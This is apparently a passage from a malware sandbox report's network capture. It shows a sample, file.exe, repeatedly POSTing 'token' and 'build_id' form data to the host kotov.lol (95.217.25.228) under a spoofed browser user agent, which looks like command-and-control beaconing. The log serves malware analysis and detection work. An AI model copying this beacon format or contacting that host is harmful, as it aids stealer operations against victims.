2024-11-29 11:29:03 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BAKEBAFIIECBGCAAAAFCCont
2024-11-29 11:29:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	49878	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:05 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:05 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IJJKKJJDAAAAAKFHJJDGCont
2024-11-29 11:29:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	49881	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:06 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:06 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------DAAAKFHIEGDGCAAAEGDGCont
2024-11-29 11:29:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	49882	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:08 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:08 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FBKJDGCGDAAAKECAKKJDCont
2024-11-29 11:29:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	49883	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:09 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1829 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:09 UTC	1829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FBKJDGCGDAAAKECAKKJDCont
2024-11-29 11:29:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.8	49884	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:11 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:11 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------ECBKKKFHCFIDHIECGCAFCont
2024-11-29 11:29:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.8	49885	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:12 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1829 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:12 UTC	1829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------ECBKKKFHCFIDHIECGCAFCont
2024-11-29 11:29:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.8	49886	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:14 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:14 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BFHDHJKKJDHJJJJKEGHICont
2024-11-29 11:29:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.8	49887	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:15 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:15 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FIIEHJDBKJKECBFHDGHJCont
2024-11-29 11:29:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.8	49888	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:17 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:17 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------JKJKKKJJJKJKFHJJJJECCont
2024-11-29 11:29:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.8	49889	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:18 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:18 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------JJEGCBGIDHCAKEBGIIDBCont
2024-11-29 11:29:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.8	49890	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:20 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:20 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AKKEGDGCGDAKEBFIJECGCont
2024-11-29 11:29:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.8	49891	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:21 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
